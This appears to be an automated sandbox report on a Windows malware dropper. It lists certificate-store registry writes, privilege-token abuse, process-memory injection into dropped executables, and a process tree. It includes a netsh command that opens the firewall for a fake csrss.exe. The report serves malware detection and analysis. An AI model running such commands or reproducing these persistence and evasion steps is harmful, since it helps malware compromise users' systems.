Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Install.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53	Install.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53\Blob = 030000000100000014000000151682f5218c0a511c28f4060a73b9ca78ce9a531400000001000000140000007c4296aede4b483bfa92f89e8ccf6d8ba972379504000000010000001000000029f1c1b26d92e893b6e6852ab708cce10f00000001000000200000005aef843ffcf2ec7055f504a162f229f8391c370ff3a6163d2db3f3d604d622be19000000010000001000000070d4f0bec2078234214bd651643b02405c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da62000000001000000640400003082046030820248a0030201020210079e492886376fd40848c23fc631e463300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f742058323076301006072a8648ce3d020106052b8104002203620004cd9bd59f80830aec094af3164a3e5ccf77acde67050d1d07b6dc16fb5a8b14dbe27160c4ba459511898eea06dff72a161ca4b9c5c532e003e01e8218388bd745d80a6a6ee60077fb02517d22d80a6e9a5b77dff0fa41ec39dc75ca68070c1feaa381e53081e2300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604147c4296aede4b483bfa92f89e8ccf6d8ba9723795301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b050003820201001b7f252b907a0876007718e1c32e8a364c417ebf174be330d75b0c7e9c96986f7bb068c02444cce2f2fcd1eadbd29f01f9174d0c9d55fda5ad6dd22f3f4b72c02eae73c7251657c23e15ade031d10a84846c6278423122461aed7a40bf9716814477ca6c7b5d215c07f2119121bfe12fc2ef6efd0520e4b4f779f32dbb372af0c6b1acac51f51fb35a1e66ce580718387f71a93c83bad7bc829e9a760f9eb029fdcbf38907481bfeab932e14210d5faf8eb754ab5d0ed45b4c71d092ea3da3369b7c1fe03b55b9d85353cc8366bb4adc810600188bf4b3d748b11341b9c4b69ecf2c778e42200b807e9fc5ab48dbbc6f048d6c4629020d708a1df11273b64624429e2a1718e3acc798c272cc6d2d766ddd2c2b2696a5cf21081be5da2fcbef9f7393aef8365f478f9728ceabe29826988bfdee28322229ed4c9509c420fa07e1862c44f68147c0e46232ed1dd83c488896c35e91b6af7b59a4eee3869cc78858ca282a66559b8580b91dd8402bc91c133ca9ebde99c21640f6f5a4ae2a256c52bac7044cb432bbfc385ca00c617b57ec774e50cfaf06a20f378ce10ed2d32f1abd9c713ecce1f8d1a8a3bd04f619c0f986aff50e1aaa956befca47714b631c4d96db55230a9d0f8175a0e640f56446036ecefa6a7d06eca4340674da53d8b9b8c6237da9f82a2da482a62e2d11cae6cd31587985e6721ca79fd34cd066d0a7bb	Install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Graphics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d601030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Graphics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c137e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeGraphics.exeGraphics.exe

pid	process
4284	pub2.exe
4284	pub2.exe
5000	Graphics.exe
5000	Graphics.exe
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
5020	Graphics.exe
3252
3252
3252
3252
3252
3252
3252
3252
3252
3252

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4284 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

3568 chrome.exe
3568 chrome.exe
3568 chrome.exe
3568 chrome.exe
3568 chrome.exe
3568 chrome.exe
3568 chrome.exe

pid	process
3568	chrome.exe
3568	chrome.exe
3568	chrome.exe
3568	chrome.exe
3568	chrome.exe
3568	chrome.exe
3568	chrome.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

Install.exeFoxSBrowser.exetaskkill.exemd9_1sjm.exeGraphics.exesvchost.exeGraphics.execsrss.exe

description	pid	process
Token: SeCreateTokenPrivilege	4048	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4048	Install.exe
Token: SeLockMemoryPrivilege	4048	Install.exe
Token: SeIncreaseQuotaPrivilege	4048	Install.exe
Token: SeMachineAccountPrivilege	4048	Install.exe
Token: SeTcbPrivilege	4048	Install.exe
Token: SeSecurityPrivilege	4048	Install.exe
Token: SeTakeOwnershipPrivilege	4048	Install.exe
Token: SeLoadDriverPrivilege	4048	Install.exe
Token: SeSystemProfilePrivilege	4048	Install.exe
Token: SeSystemtimePrivilege	4048	Install.exe
Token: SeProfSingleProcessPrivilege	4048	Install.exe
Token: SeIncBasePriorityPrivilege	4048	Install.exe
Token: SeCreatePagefilePrivilege	4048	Install.exe
Token: SeCreatePermanentPrivilege	4048	Install.exe
Token: SeBackupPrivilege	4048	Install.exe
Token: SeRestorePrivilege	4048	Install.exe
Token: SeShutdownPrivilege	4048	Install.exe
Token: SeDebugPrivilege	4048	Install.exe
Token: SeAuditPrivilege	4048	Install.exe
Token: SeSystemEnvironmentPrivilege	4048	Install.exe
Token: SeChangeNotifyPrivilege	4048	Install.exe
Token: SeRemoteShutdownPrivilege	4048	Install.exe
Token: SeUndockPrivilege	4048	Install.exe
Token: SeSyncAgentPrivilege	4048	Install.exe
Token: SeEnableDelegationPrivilege	4048	Install.exe
Token: SeManageVolumePrivilege	4048	Install.exe
Token: SeImpersonatePrivilege	4048	Install.exe
Token: SeCreateGlobalPrivilege	4048	Install.exe
Token: 31	4048	Install.exe
Token: 32	4048	Install.exe
Token: 33	4048	Install.exe
Token: 34	4048	Install.exe
Token: 35	4048	Install.exe
Token: SeDebugPrivilege	2716	FoxSBrowser.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeManageVolumePrivilege	1196	md9_1sjm.exe
Token: SeDebugPrivilege	5000	Graphics.exe
Token: SeImpersonatePrivilege	5000	Graphics.exe
Token: SeTcbPrivilege	2408	svchost.exe
Token: SeTcbPrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	1196	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	5020	Graphics.exe
Token: SeManageVolumePrivilege	1196	md9_1sjm.exe
Token: SeShutdownPrivilege	3252
Token: SeCreatePagefilePrivilege	3252
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeSystemEnvironmentPrivilege	1936	csrss.exe
Token: SeBackupPrivilege	2408	svchost.exe
Token: SeRestorePrivilege	2408	svchost.exe
Token: SeManageVolumePrivilege	1196	md9_1sjm.exe
Token: SeManageVolumePrivilege	1196	md9_1sjm.exe
Token: SeShutdownPrivilege	3252
Token: SeCreatePagefilePrivilege	3252
Token: SeShutdownPrivilege	3252
Token: SeCreatePagefilePrivilege	3252

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

chrome.exe

pid process

3568 chrome.exe
3568 chrome.exe

pid	process
3568	chrome.exe
3568	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exeFolder.exerUNdlL32.eXeInstall.execmd.exesvchost.exeGraphics.execmd.exechrome.execsrss.exe

description	pid	process	target process
PID 3740 wrote to memory of 1196	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	md9_1sjm.exe
PID 3740 wrote to memory of 1196	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	md9_1sjm.exe
PID 3740 wrote to memory of 1196	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	md9_1sjm.exe
PID 3740 wrote to memory of 2716	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	FoxSBrowser.exe
PID 3740 wrote to memory of 2716	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	FoxSBrowser.exe
PID 3740 wrote to memory of 4460	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Folder.exe
PID 3740 wrote to memory of 4460	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Folder.exe
PID 3740 wrote to memory of 4460	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Folder.exe
PID 3740 wrote to memory of 5000	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Graphics.exe
PID 3740 wrote to memory of 5000	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Graphics.exe
PID 3740 wrote to memory of 5000	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Graphics.exe
PID 3740 wrote to memory of 3556	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Updbdate.exe
PID 3740 wrote to memory of 3556	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Updbdate.exe
PID 3740 wrote to memory of 3556	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Updbdate.exe
PID 3740 wrote to memory of 4048	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Install.exe
PID 3740 wrote to memory of 4048	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Install.exe
PID 3740 wrote to memory of 4048	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Install.exe
PID 3740 wrote to memory of 4428	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	File.exe
PID 3740 wrote to memory of 4428	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	File.exe
PID 3740 wrote to memory of 4428	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	File.exe
PID 3740 wrote to memory of 4284	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	pub2.exe
PID 3740 wrote to memory of 4284	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	pub2.exe
PID 3740 wrote to memory of 4284	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	pub2.exe
PID 3740 wrote to memory of 4564	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Files.exe
PID 3740 wrote to memory of 4564	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Files.exe
PID 3740 wrote to memory of 4504	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Details.exe
PID 3740 wrote to memory of 4504	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Details.exe
PID 3740 wrote to memory of 4504	3740	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Details.exe
PID 4460 wrote to memory of 3724	4460	Folder.exe	Folder.exe
PID 4460 wrote to memory of 3724	4460	Folder.exe	Folder.exe
PID 4460 wrote to memory of 3724	4460	Folder.exe	Folder.exe
PID 4344 wrote to memory of 2648	4344	rUNdlL32.eXe	rundll32.exe
PID 4344 wrote to memory of 2648	4344	rUNdlL32.eXe	rundll32.exe
PID 4344 wrote to memory of 2648	4344	rUNdlL32.eXe	rundll32.exe
PID 4048 wrote to memory of 3904	4048	Install.exe	cmd.exe
PID 4048 wrote to memory of 3904	4048	Install.exe	cmd.exe
PID 4048 wrote to memory of 3904	4048	Install.exe	cmd.exe
PID 3904 wrote to memory of 1172	3904	cmd.exe	taskkill.exe
PID 3904 wrote to memory of 1172	3904	cmd.exe	taskkill.exe
PID 3904 wrote to memory of 1172	3904	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 5020	2408	svchost.exe	Graphics.exe
PID 2408 wrote to memory of 5020	2408	svchost.exe	Graphics.exe
PID 2408 wrote to memory of 5020	2408	svchost.exe	Graphics.exe
PID 4048 wrote to memory of 2900	4048	Install.exe	xcopy.exe
PID 4048 wrote to memory of 2900	4048	Install.exe	xcopy.exe
PID 4048 wrote to memory of 2900	4048	Install.exe	xcopy.exe
PID 5020 wrote to memory of 3560	5020	Graphics.exe	cmd.exe
PID 5020 wrote to memory of 3560	5020	Graphics.exe	cmd.exe
PID 3560 wrote to memory of 2836	3560	cmd.exe	netsh.exe
PID 3560 wrote to memory of 2836	3560	cmd.exe	netsh.exe
PID 5020 wrote to memory of 1936	5020	Graphics.exe	csrss.exe
PID 5020 wrote to memory of 1936	5020	Graphics.exe	csrss.exe
PID 5020 wrote to memory of 1936	5020	Graphics.exe	csrss.exe
PID 2408 wrote to memory of 1980	2408	svchost.exe	schtasks.exe
PID 2408 wrote to memory of 1980	2408	svchost.exe	schtasks.exe
PID 4048 wrote to memory of 3568	4048	Install.exe	chrome.exe
PID 4048 wrote to memory of 3568	4048	Install.exe	chrome.exe
PID 3568 wrote to memory of 636	3568	chrome.exe	chrome.exe
PID 3568 wrote to memory of 636	3568	chrome.exe	chrome.exe
PID 1936 wrote to memory of 1652	1936	csrss.exe	injector.exe
PID 1936 wrote to memory of 1652	1936	csrss.exe	injector.exe
PID 3568 wrote to memory of 972	3568	chrome.exe	chrome.exe
PID 3568 wrote to memory of 972	3568	chrome.exe	chrome.exe
PID 3568 wrote to memory of 972	3568	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe
"C:\Users\Admin\AppData\Local\Temp\E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3740

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
"C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4460

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:3724

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:2836

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
